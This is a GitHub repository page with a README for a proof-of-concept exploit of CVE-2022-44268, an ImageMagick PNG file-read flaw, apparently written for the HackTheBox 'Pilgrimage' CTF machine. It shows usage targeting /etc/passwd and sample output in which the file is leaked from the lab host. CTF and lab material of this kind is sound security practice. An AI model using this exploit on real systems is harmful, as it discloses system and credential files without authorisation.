https://github.com/bhattjayd/pilgrimagectfexploit
https://github.com/bhattjayd/pilgrimagectfexploit
Last synced: 8 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/bhattjayd/pilgrimagectfexploit
- Owner: BhattJayD
- Created: 2024-01-01T14:35:01.000Z (almost 2 years ago)
- Default Branch: main
- Last Pushed: 2024-01-01T14:49:32.000Z (almost 2 years ago)
- Last Synced: 2024-12-30T07:18:28.110Z (9 months ago)
- Language: Python
- Size: 2.93 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
#### ImageMagick LFI PoC [CVE-2022-44268]
ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary. file (if the magick binary has permissions to read it).
#### Usages
```python
python3 exploit.py
```
eg:-
```python
python3 exploit.py gopro.png /etc/passwd
```
#### requirements
```bash
sudo apt-get install pngcrush imagemagick exiftool exiv2 -y
```
#### example response
```bash
$python3 exploit.py ../gopro.png /etc/passwd
Argument 1: /etc/passwd
sigining up for cookies
got the cookies PHPSESSID=nhidflc7k6merrhit3ljp656g1; path=/ response
file uploading
/?message=http://pilgrimage.htb/shrunk/6592cfb863794.png&status=success
file uploaded
saved filename : 6592cfb863794.png now downloading file
wget http://pilgrimage.htb/shrunk/6592cfb863794.png
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
eXXXy:x:1000:1000:eXXXy,,,:/home/eXXXy:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
```